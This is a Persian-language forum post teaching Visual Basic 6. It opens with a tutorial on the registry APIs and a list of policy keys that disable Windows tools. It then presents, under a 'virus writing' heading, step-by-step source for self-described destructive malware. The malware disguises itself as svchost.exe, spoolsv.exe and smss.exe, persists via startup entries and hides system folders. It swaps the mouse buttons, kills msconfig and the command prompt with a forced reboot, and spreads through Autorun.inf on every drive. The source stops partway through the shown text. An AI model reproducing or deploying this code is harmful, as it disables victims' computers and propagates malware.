منو
 کاربر Online
697 کاربر online
 : کامپیوتر
برای پاسخ دادن به این ارسال باید از صفحه قبلی اقدام کنید.   ناشناس   در :  یکشنبه 21 بهمن 1386 [08:44 ]
  آموزش حرفه ای VB
 

SALAM
با عرض سلام و خسته نباشید خدمت کاربران گرامی
من میلاد هستم و در اینجا میخواهم چند آموزش ساخت نرم افزار را از طریق
برنامه نویسی VB به شما آموزش بدهم امید وارم از این آموزش ها کمال رضایت
را داشته باشید wink
exclaimexclaimexclaimexclaimexclaimexclaim
(این قسمت برای جلوگیری از دسترسی اسپم‌ها توسط مدیر انجمن ویرایش گردید، لطفا از درج آدرس و ایمیل جدا خودداری نمایید)
...................................................................
کار با رجیستری (توابع کار با رجیستری)


برای کار کردن با رجیستری باید از توابع API استفاده کنیم. با تعریف این توابع شما میتونید با رجیستری هر کاری که بخواید بکنید. برای آشنایی با این توابع این آموزش رو تا آخرش دنبال کنید.


تعریف توابع و ثابتهای مورد نیاز. کدهای زیر رو تو Module کپی کنید و به ادامه آموزش توجه کنید :


Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002

Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Public Const REG_NONE = 0
Public Const REG_MULTI_SZ = 7
Public Const REG_EXPAND_SZ = 2
Public Const REG_BINARY = 3

Public Declare Function RegCreateKey Lib `advapi32.dll` Alias `RegCreateKeyA` (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValueEx Lib `advapi32.dll` Alias `RegSetValueExA` (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Declare Function RegCloseKey Lib `advapi32.dll` (ByVal hKey As Long) As Long
Public Declare Function RegDeleteValue Lib `advapi32.dll` Alias `RegDeleteValueA` (ByVal hKey As Long, ByVal lpValueName As String) As Long
Public Declare Function RegDeleteKey Lib `advapi32.dll` Alias `RegDeleteKeyA` (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Public Declare Function RegOpenKey Lib `advapi32.dll` Alias `RegOpenKeyA` (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegQueryValueEx Lib `advapi32.dll` Alias `RegQueryValueExA` (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long






در طی این آموزش شما یا میگیرید Task Managerرو غیر فعال کنید.


برای غیر فعال کردن Task Manager باید در مسیر زیر یک کلید از نوع REG_DWORD با نام DisableTaskMgr بسازید و مقدار اونو 1 بذارید تا Task Manager غیر فعال بشه و برای فعال کردن دوباره باید مقدار اونو 0 بذارید.


HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem


RegCreateKey : این تابع برای ساختن یک مسیر در رجیستری به کار میره. فرض کنید میخواید مسیر زیر رو تو رجیستری بسازید :


HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem


قسمتی که پر رنگه در حال حاضر تو رجیستری وجود نداره و ما قصد داریم اون مسیر رو بسازیم. به کد زیر توجه کنید :


r = RegCreateKey(HKEY_CURRENT_USER, `SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem`, keyhand)


کد بالا در شاخه اصلیه HKEY_CURRENT_USER مسیری که گفتیم رو جستجو میکنه و اگه قسمتی از مسیر رو پیدا نکرد، اون مسیر رو میسازه. متغیر keyhand یک اشاره گر از کلید یافت شده بر میگردونه که خیلی به دردمون میخوره و از اینجا به بعد سر و کارمون با اون اشاره گره. در صورتی که به هر دلیلی عملیات نا موفق باشه تابع عددی غیر از 0 درون متغیر r قرار میده که معمولاً این اتفاق نمی افته.


خب مسیری که باید میساختیم، ساخته شد. حالا باید یک کلید از نوع REG_DWORD با نام DisableTaskMgr بسازیم و مقدار اونو 1 بذاریم.


RegSetValueEx : این تابع یک کلید (برای درک بهتر، کلید رو یک فایل در نظر بگیرید) از هر نوعی که تعیین کنیم (برای درک بهتر، نوع را پسوند فایل در نظر بگیرید. مثلاً REG_SZ پسوند .txt داره) در مسیری که تعیین میکنیم میسازه و مقدار تعیین شده رو درون اون کلید قرار میده (برای درک بهتر، مقدار رو محتوای فایل در نظر بگیرید). فرض کنید میخوایم در اون مسیری که در مرحله قبل ساخته بودیم، کلید DisableTaskMgr رو بسازیم و مقدارشو 1 بذاریم :


r = RegSetValueEx(keyhand, `DisableTaskMgr`, 0, REG_DWORD, 1, 4)


خب میبینید که به جای نوشتن کل مسیر، از همون اشاره گر که گفته بودم استفاده کردم. این اشاره گر به همون مسیری که ساخته بودیم اشاره میکنه و کار ما رو خیلی ساده میکنه چون ما رو از نوشتن مسیرهای طول و دراز راحت میکنه. DisableTaskMgr هم که معلومه چیه؛ کلید یا همون فایلمونه. به تون عدد 0 که بعد از نام کلید اومده کاری نداشته باشید. میبینید که بعد از عدد 0 نوع متغیر تعیین شده و بعدش هم مقدارش تعیین شده که باید 1 باشه ولی اون عدد 4 چیه دیگه؟


نوع REG_DWORD یک نوع عددیه و اعداد در اون در مبنای 16 (Hexadecimal) ذخیره میشن. مثلاً عدد 1 به صورت 01 00 00 00 ذخیره میشه و میبینید که این عدد از چهار قسمت مجزا تشکیل شده که اگر هر کدوم از این چهار قسمت رو ننویسیم عدد ما اشتباه خواهد بود. چند تا مثال براتون میزنم تا بهتر این موضوع رو متوجه بشید :


10 = 0A 00 00 00
11 = 0B 00 00 00
15 = 0F 00 00 00
16 = 10 00 00 00
255 = FF 00 00 00
256 = 00 01 00 00
511 = FF 01 00 00
512 = 00 02 00 00



اعداد در اینجا به صورت هشت بایتی ذخیره میشن پس نتیجه میگیریم که اون عدد 4 نشانگر 4 قسمته دو بایتیه (هر بایت در مبنای 16 از دو عدد و در مبنای 2 از هشت عدد تشکیل میشه). توضیح در این باره بسه. (من سخت افزارم ضعیفه. صخط عفذار بد)


خب کلید DisableTaskMgr رو ساختیم اما هنوز یک کار دیگه مونده و اونم اتمام کار با اشاره گر هستش.


RegCloseKey : این تابع کار با اشاره گره keyhand رو تموم میکنه. حتماً پیش خودتون میگید که این کار په لزومی داره؟ اگه با فایلها کار کرده باشید، میدونید که بعد از کار با یک فایل باید اونو بست و این کار با دستور Close #1 انجام میشد که عدد #1 اشاره گره فایل بود. در اینجا هم دقیقاً مانند کار با فایلها باید نام اشاره گر رو جلوی دستور RegCloseKey تایپ کنیم تا اشاره گر از بین بره یا به قول معروف فایل بسته بشه:


r = RegCloseKey(keyhand)


خب دیگه، کارمون تمومه حالا دیگه میتونیم Task Manager رو غیر فعال کنیم. به کد زیر توجه کنید تا بهتر با مفهوم اشاره گر و طرز کارش آشنا بشید.


Private Sub Command1_Click()
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_CURRENT_USER, `SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem`, keyhand)
r = RegSetValueEx(keyhand, `DisableTaskMgr`, 0, REG_DWORD, 1, 4)
r = RegCloseKey(keyhand)
End Sub





حالا میخوایم کلیدی که ساختیم رو پاک کنیم تا Task Manager به حالت اولش برگرده.




RegDeleteValue : این تابع کلید تعیین شده رو پاک میکنه. این تابع هم مانند تابع RegSetValueEx اشاره گری که تعیین کننده مسیر است رو میگیره و اون مسیر کلید تعیین شده رو پیدا میکنه و پاک میکنه:


r = RegDeleteValue(keyhand, “DisableTaskMgr”)


البته شما باید قبل از این دستور مسیر مورد نظر رو با دستور RegOpenKey و یا RegCreateKey باز کنید.


RegDeleteKey : این تابع یک مسیر رو دریافت میکنه و انتهای اونو پاک میکنه:


r = RegDeleteKey(keyhand, `System`)


البته بازم شما باید قبل از این دستور مسیر مورد نظر رو با دستور RegOpenKey و یا RegCreateKey باز کنید ولی میتونید این کارو با همین تابع انجام بدید:


r = RegDeleteKey(HKEY_CURRENT_USER, `SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem`)


این دستور فقط مسیر System رو پاک میکنه یعنی به قبل از اون کاری نداره در عین حال اگه بعد از مسیر System مسیر دیگه ای وجود داشته باشه نمیتونه ادامه مسیر رو پاک کنه. مثل مسیر زیر :


HKEY_CURRENT_USER SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystemVisualBasic


در اینجا تابع قادر به حذف قسمت پر رنگ نخواهد بود و برای حذف این مسیر باید اونو از آخر پاک کنیم یعنی اول Basic رو پاک کنیم، بعد Visual رو پاک کنیم و بعد System رو پاک کنیم.


RegOpenKey : این تابع تقریباً مثل تابع RegCreateKey کار میکنه با این تفاوت که قادر به ساختن مسیر نیست و فقط مسیر داده شده رو باز میکنه و یک اشاره گر از اون میسازه:


r = RegOpenKey(HKEY_CURRENT_USER, `SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem`, keyhand)


RegQueryValueEx : این دستور برای خوندن مقادیر کلیدها به کار میره. فرض کنید میخوایم بدونیم که الان فایلهای مخفی در حال نمایش هستند یا نه، برای فهمیدن این موضوع اگر مقدار کلید Hidden در مسیر زیر 1 بود یهنی در حال نمایش هستند و اگر 0 بود یعنی مخفی هستند :


HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced


برنامه زیر به مسیر بالا رجوع میکنه و محتوای کلید Hidden رو درون متغیر lngData قرار میده. این متغیر از نوع REG_DWORD هست و مقادیر 1 یا 0 میگیره که نشانگر Show یا Don’t Show بودن فایلهای مخفیه:


Private Sub Form_Load()
Dim lngData As Long
r = RegOpenKey(HKEY_CURRENT_USER, `SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced`, keyhand)
r = RegQueryValueEx(keyhand, `Hidden`, 0, REG_DWORD, lngData, 4)
r = RegCloseKey(keyhand)
MsgBox IIf(lngData, `Yes`, `No`)
End Sub





حالا میخوای مبدونیم که کمپانی کامپیوتر چیه. برای متوجه شدن این موضوع باید به مسیر زیر رجوع کنید و محتوای کلید RegisteredOrganization رو ببینید. با استفاده از کد بالا نمیشه اینکارو انجام داد چون ما نمیدونیم محتوای کلید RegisteredOrganization چند کاراکتره و متناسب با اون یک متغیر بسازیم، پس کاری که میکنیم اینه که اول از همه اطلاعاتی درباره کلید مورد نظر بدست بیاریم. به تکه برنامه زیر توجه کنید :


Private Sub Form_Load()
Dim lValueType As Long, strBuf As String, lDataBufSize As Long

`Open The Key
r = RegOpenKey(HKEY_LOCAL_MACHINE, `SOFTWAREMicrosoftWindows NTCurrentVersion`, keyhand)

`Retrieve Information About The Key
Result = RegQueryValueEx(keyhand, `RegisteredOrganization`, 0, lValueType, ByVal 0, lDataBufSize)

`Create a Buffer
strBuf = String(lDataBufSize, Chr$(0))

`Retrieve The Key`s Content
r = RegQueryValueEx(keyhand, `RegisteredOrganization`, 0, REG_SZ, ByVal strBuf, lDataBufSize)

`Close The Key
r = RegCloseKey(keyhand)

`Show Organization Name
MsgBox Left$(strBuf, InStr(1, strBuf, Chr$(0)) - 1)
End Sub



تا اینجا تعدادی از توابعی که برای کار کردن با رجیستری لازمتون میشن رو یاد گرفتید. البته توابع کار با رجیستری محدود به همین چند تا نمیشن و بیشترن اما همین تعداد توابع جوابگوی نیازهای شماست. موفق باشید.





غیر فعال کردن رجیستری


Key: HKEY_CURRENT_USERsoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
Value Name: DisableRegistryTools
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Enable, 1 = Disable)





غیر فعال کردن Task Manager


Key: HKEY_CURRENT_USERsoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
Value Name: DisableTaskMgr
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Enable, 1 = Disable)





غیر فعال کردن Display Properties


Key: HKEY_CURRENT_USERsoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
Value Name: NoDispCPL
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Enable, 1 = Disable)







غیر فعال کردن Shutdown


Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer
Value Name: NoClose
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Enable, 1 = Disable)






غیر فعال کردن جستجو


Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer
Value Name: NoFind
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Enable, 1 = Disable)






غیر فعال کردن System Properties


Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer
Value Name: NoPropertiesMyComputer
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Enable, 1 = Disable)







غیر فعال کردن Run


Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer
Value Name: NoRun
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Enable, 1 = Disable)







مخفی کردن گزینه All Programs از منوی Start


Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer
Value Name: NoStartMenuMorePrograms
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Show, 1 = Hide)







مخفی کردن درایو C:


Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer
Value Name: NoDrives
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Show, 4 = Hide)







مخفی کردن Control Panel


Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer
Value Name: NoControlPanel
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Enable, 1 = Disable)







غیر فعال کردن Folder Options


Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer
Value Name: NoFolderOptions
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Enable, 1 = Disable)







نمایش فایلهای مخفی


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Value Name: Hidden
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Show, 1 = Hide)







نمایش فایلهای ابر مخفی


Key: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Value Name: SuperHidden
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Show, 1 = Hide)







غیر فعال کردن Add/Remove


Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesUninstall
Value Name: NoAddRemovePrograms
Data Type : REG_DWORD (DWORD Value)
Value Data : (0 = Enable, 1 = Disable)






تغییر نام و کمپانی


Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion
Value Name: RegisteredOwner , RegisteredOrganization
Data Type : REG_SZ (DWORD Value)
Value Data : (Your Name, Organization Name)

.....................................................arrowarrow.......................................
ویروس نویسی





آموزش ساخت یک ویروس قوی و آزار دهنده


اخطار : این وبلاگ هیچگونه مسئولیتی در قبال استفاده های ناهنجار و مخرب از آموزشهای این بخش را نخواهد پذیرفت و مسئولیت استفاده از مطالب این بخش از وبلاگ فقط با شماست. مطالب این بخش از وبلاگ مختص کسانی است که قصد یادگیری و درک طرز کار ویروس ها را دارند خواهد بود. توصیه میشود مطالب این بخش را فقط برای یادگیری هر چه بهتر ویژوال بیسیک مطالعه نمایید و از سو استفاده های غیر اخلاقی و آزار و اذیت، جدّاً خودداری نمایید.


توجه : استفاده از مطالب این بخش فقط با ذکر منبع مجاز میباشد.


خب الوعده وفا. اینم آموزش ساخت ویروسی که قولشو داده بودم، یک ویروس خطرناک.


درباره ویروس : خرابکاری های این ویروس عبارت اند از :


1- اعمال محدودیت های زیر از طریق رجیستری :


· غیر فعال کردن رجیستری (DisableRegEdit)


· غیر فعال کردن Task Manager (DisableTaskManager)


· غیر فعال کردن تنظیمات صفحه نمایش (DisableDisplayProperties)


· غیر فعال کردن Shutdown (DisableShutdown)


· غیر فعال کردن جستجو (DisableSearch)


· غیر فعال کردن System Properties (DisableMyComputerProperties)


· غیر فعال کردن Run (DisableRun)


· ناپدید کردن All Programs از منوی Start (DisableAllPrograms)


· مخفی کردن درایو C: (HideDrive_C)


· غیر فعال کردن کنترل پنل (DisableControlPanel)


· غیر فعال کردن Folder Options (DisableFolderOption)


· محدود کردن نمایش فایلهای مخفی (DontShowHiddenFiles)


· محدود کردن نمایش فایلهای ابر مخفی (DontShowSuperHiddenFiles)


· غیر فعال کردن Add/Remove (DisableAddRemove)


· تغییر نام و کمپانی کامپیوتر (ChangeNameAndCompanyName)


2- تغییر دادن کلیک چپ و راست ماوس هر چند لحظه یک بار از طریق توابع API


3- اجرای شدن خودکار ویروس موقع Open کردن درایوها با استفاده از فایل Autorun.inf

ویروس جالبی به نظر میرسه چون کاربر رو خیلی محدود میکنه و باعث میشه که کاربر راهی جز تعویض ویندوز نداشته باشه.


بعضی از محدودیت های ذکر شده در بند 1 بلافاصله پس از اجرای ویروس اعمال میشن، مثلاً عیر فعال کردن Task Manager و Registry و Folder Options و چند تای دیگه. برای اعمال شدن تغییرات و محدودیت های دیگه، ویندوز باید یکبار Logoff یا راه اندازی دوباره بشه.


این ویروس در ابتدای اجرا از کد App.TaskVisible = False استفاده میکنه که باعث میشه برنامه تو Task Manager دیده نشه و این خیلی به نفع شما و به ضرر کاربره. این ویروس بلافاصله پس از اجرا، یک نسخه از خودشو با نامهای svchost.exe و spoolsv.exe در پوشه System32Drivers کپی میکنه و یک نسخه با نام smss.exe رو هم در مسیر All UsersApplication Data کپی میکنه و بعد همشون رو تو Startup قرار میده و بعد اجراشون میکنه که با اینکار آنتی ویروسها میتونن اونو شناسایی کنن. مزیت اینکارا اینه که کاربر نتونه ویروسی رو که با نام smss.exe اجرا شده از حافظه خارج کنه (End Task). در ضمن پوشه های داخل درایو ویندوز رو ابر مخفی (Super Hidden) میکنه.


توجه : برای درک و فهم بهتره مطالب این بخش، باید با رجیستری و طرز کار اون آشنا باشید که در ادامه بیشتر توضیح میدم.


این ویروس از دو بخش تشکیل شده : اول بخش خرابکاری و دستکاری رجیستری. دوم بخش بلاک اصلی برنامه که میتونید هر چیزی که دلتون میخواد اونجا اضافه کنید. برای اینکه کارای ویروس مدام انجام بشن و محدود به لود فرم نباشن باید اونا رو تو یک یا چند تا تایمر قرار بدید. من از سه تایمر استفاده کردم تایمر اول برای عوض کردن کلید چپ و راست ماوس است، تایم دوم بر ای تعیین Interval تایمر اوله تا حالت یکنواختی پیدا نکنه و هر چند لحظه یکبار (بین 1 تا 5 ثانیه) کلید چپ و راست ماوس عوض بشه و تایمر سوم هم سه کار انجام میده : 1- ساختن فایل Autorun.inf تو تمام درایوها 2- بستن System Configuration Utility که احتمال میره کاربر اونو باز کنه 3- بستن Command Prompt که احتمال میره کاربر اونو باز کنه.


خب توضیحات درباره ویروس کافیه بهتره بریم سر وقته آموزش.


آموزش ساخت :


اول یک پروژه جدید باز کنید و بهش دو تا Module اضافه کنید و به فرمتون هم سه تا تایمر و اضافه کنید و مشخصات زیر رو تغییر بدید :



Form Properties
Name = frmVirus
BorderStyle = 0 - None
Caption = خالی بذارید
ShowInTaskbar = False
Height = 0
Width = 0
Left = -5000
Top = -5000
Visible = False
Timers Properties
Timer1.Interval = 0
Timrr2.Interval = 5000
Timer3.Interval = 500

حالا کدهای زیر رو تو قسمت جنرال فرمتون کپی کنید :


Dim bln As Boolean

Private Sub Form_Load()
App.TaskVisible = False
If App.PrevInstance = True Then End

Dim Ret As Long
Dim CLR As Long
Me.BackColor = RGB(1, 1, 1)
CLR = Me.BackColor
Ret = GetWindowLong(Me.hWnd, GWL_EXSTYLE)
Ret = Ret Or WS_EX_LAYERED
SetWindowLong Me.hWnd, GWL_EXSTYLE, Ret
SetLayeredWindowAttributes Me.hWnd, CLR, 0, LWA_COLORKEY

Dim sSave As String

On Error Resume Next

strSource = App.Path & IIf(Len(App.Path) > 0, ``, Empty)
strSource = strSource & App.EXEName & `.exe`

SetAttr WinDrive & `Windows`, vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
SetAttr WinDrive & `Program Files`, vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
SetAttr WinDrive & `Documents and Settings`, vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
SetAttr WinDrive & `WindowsSystem`, vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
SetAttr WinDrive & `WindowsSystem32`, vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly

If (App.EXEName `svchost` And App.EXEName `spoolsv` And App.EXEName `smss`) Then
strDest = WinDrive & `WINDOWSsystem32drivers`

FileCopy strSource, strDest & `svchost.exe`
AddToRun `svchost`, strDest & `svchost.exe`
SetAttr strDest & `svchost.exe`, vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & `svchost.exe`, vbNormalNoFocus

FileCopy strSource, strDest & `spoolsv.exe`
AddToRun `spoolsv`, strDest & `spoolsv.exe`
SetAttr strDest & `spoolsv.exe`, vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & `spoolsv.exe`, vbNormalNoFocus

strDest = WinDrive & `Documents and SettingsAll UsersApplication Data`
FileCopy strSource, strDest & `smss.exe`
AddToRun `smss`, strDest & `smss.exe`
SetAttr strDest & `smss.exe`, vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & `smss.exe`, vbNormalNoFocus
End If

Call Sabotage
`
Timer2.Enabled = True
Timer3.Enabled = True

End Sub

Private Sub Timer1_Timer()
If bln = True Then
bln = False
Timer1.Enabled = False
Call SwapMouseButton(1)
Else
bln = True
Call SwapMouseButton(0)
End If

If blnBlockinput = True Then Call BlockInput(0)
End Sub

Private Sub Timer2_Timer()
If Timer1.Enabled = False Then
Timer1.Interval = CLng(Rnd * 5000)
Timer1.Enabled = True
End If
End Sub

Private Sub Timer3_Timer()
Call MakeAutoRun
Call CloseProgram(`System Configuration Utility`)
Call CloseProgram(`Command Prompt`)
End Sub

خب حالا کد زیر رو تو Module1 کپی کنید :


Public Declare Function RegCreateKey Lib `advapi32.dll` Alias `RegCreateKeyA` (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValueEx Lib `advapi32.dll` Alias `RegSetValueExA` (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Declare Function RegDeleteValue Lib `advapi32.dll` Alias `RegDeleteValueA` (ByVal HKey As Long, ByVal lpValueName As String) As Long
Public Declare Function RegCloseKey Lib `advapi32.dll` (ByVal HKey As Long) As Long
Public Declare Function RegOpenKey Lib `advapi32.dll` Alias `RegOpenKeyA` (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Public Const REG_NONE = 0
Public Const REG_MULTI_SZ = 7
Public Const REG_EXPAND_SZ = 2
Public Const REG_BINARY = 3

Public Declare Function SetWindowLong Lib `User32` Alias `SetWindowLongA` (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Public Declare Function SetLayeredWindowAttributes Lib `user32.dll` (ByVal hWnd As Long, ByVal crKey As Long, ByVal bAlpha As Byte, ByVal dwFlags As Long) As Long
Public Declare Function GetSystemDirectory Lib `kernel32` Alias `GetSystemDirectoryA` (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetWindowText Lib `User32` Alias `SetWindowTextA` (ByVal hWnd As Long, ByVal lpString As String) As Long
Public Declare Function EnumWindows Lib `User32` (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function IsWindowVisible Lib `User32` (ByVal hWnd As Long) As Long
Public Declare Function GetParent Lib `User32` (ByVal hWnd As Long) As Long
Public Declare Function GetWindowLong Lib `User32` Alias `GetWindowLongA` (ByVal hWnd As Long, ByVal nIndex As Long) As Long
Public Declare Function GetWindowText Lib `User32` Alias `GetWindowTextA` (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function SendMessage Lib `User32` Alias `SendMessageA` (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const GWL_HWNDPARENT = (-8)
Public Const LB_ADDSTRING = &H180
Public Const LB_SETITEMDATA = &H19A
Public Declare Function GetActiveWindow Lib `User32` () As Long

Public Declare Function GetWindowDC Lib `User32` (ByVal hWnd As Long) As Long
Public Declare Function TextOut Lib `gdi32` Alias `TextOutA` (ByVal hdc As Long, ByVal X As Long, ByVal Y As Long, ByVal lpString As String, ByVal nCount As Long) As Long
Public Declare Function BlockInput Lib `User32` (ByVal fBlock As Long) As Long
Public Declare Function GetWindowsDirectory Lib `kernel32` Alias `GetWindowsDirectoryA` (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Const LWA_COLORKEY = &H1
Public Const GWL_EXSTYLE = (-20)
Public Const WS_EX_LAYERED = &H80000
Public Const BM_SETSTATE = &HF3

Public Const HWND_TOPMOST = -1
Public Const HWND_NOTOPMOST = -2
Public Const SWP_NOMOVE = &H2
Public Const SWP_NOSIZE = &H1
Public Const SWP_NOACTIVATE = &H10
Public Const SWP_SHOWWINDOW = &H40
Public Const TOPMOST_FLAGS = SWP_NOMOVE Or SWP_NOSIZE
Public Declare Function SwapMouseButton Lib `User32` (ByVal bSwap As Long) As Long
Public Declare Function SetWindowPos Lib `User32` (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, Y, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Const TH32CS_SNAPHEAPLIST = &H1
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPTHREAD = &H4
Const TH32CS_SNAPMODULE = &H8
Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Const TH32CS_INHERIT = &H80000000
Const MAX_PATH As Integer = 260
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Private Declare Function CreateToolhelp32Snapshot Lib `kernel32` (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib `kernel32` (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib `kernel32` (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Sub CloseHandle Lib `kernel32` (ByVal hPass As Long)

Public Declare Function FindWindow Lib `User32` Alias `FindWindowA` (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

Public hSnapShot As Long, uProcess As PROCESSENTRY32
Public blnMsgBoxResult As Boolean
Public strSource As String, strDest As String
Public strOutput(20) As String, strTemp As String
Public blnBlockinput As Boolean
Public strSysDir As String, strFileExist As String
Public strAppPath As String

و حالا کد زیر رو تو Module2 کپی کنید :


Private Sub SaveString(ByVal HKey As Long, strPath As String, strValue As String, ByVal lngdata As Long, ByVal lngType As Long, ByVal lngLen As Long)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, lngType, lngdata, CLng(lngLen))
r = RegCloseKey(keyhand)
End Sub

Public Sub MakeTopMost(lngHwnd As Long)
SetWindowPos lngHwnd, HWND_TOPMOST, 0, 0, 0, 0, TOPMOST_FLAGS
End Sub

Public Function WinDrive() As String
Dim strDrive As String
strDrive = Space(500)
A = GetWindowsDirectory(strDrive, Len(strDrive))
strDrive = Left(strDrive, 3)
WinDrive = strDrive
End Function

Public Sub CloseProgram(ByVal WindowName As String)
On Error Resume Next
Handle = FindWindow(vbNullString, WindowName)
If Handle = 0 Then Exit Sub
Call SendMessage(Handle, &H10, 0&, 0&)
Shell `Shutdown -r -t 0`
End Sub

Public Sub MakeAutoRun()
On Error Resume Next
strAutorun = `autorun` & vbCrLf & _
`OPEN=Autorun.exe` & vbCrLf & _
`shellopen=Open` & vbCrLf & _
`shellopenCommand=Autorun.exe` & vbCrLf & _
`shellexplore=Explore` & vbCrLf & _
`shellexploreCommand=``Autorun.exe -e```

For I = 67 To 90 ` az Drive C: ta Drive Z:
Open Chr(I) & `:Autorun.inf` For Output As #1
Print #1, strAutorun
Close #1
SetAttr Chr(I) & `:Autorun.inf`, vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
FileCopy WinDrive & `Documents and SettingsAll UsersApplication Datasmss.exe`, Chr(I) & `:Autorun.exe`
SetAttr Chr(I) & `:Autorun.exe`, vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Next

End Sub

Public Sub Sabotage() ` Sabotage = Kharab kari
Call DisableRegEdit
Call DisableTaskManager
Call DisableDisplayProperties
Call DisableShutdown
Call DisableSearch
Call DisableMyComputerProperties
Call DisableRun
Call DisableAllPrograms
Call HideDrive_C
Call DisableControlPanel
Call DisableFolderOption
Call DontShowHiddenFiles
Call DontShowSuperHiddenFiles
Call DisableAddRemove
Call ChangeNameAndCompanyName
End Sub

Private Sub DisableRegEdit()
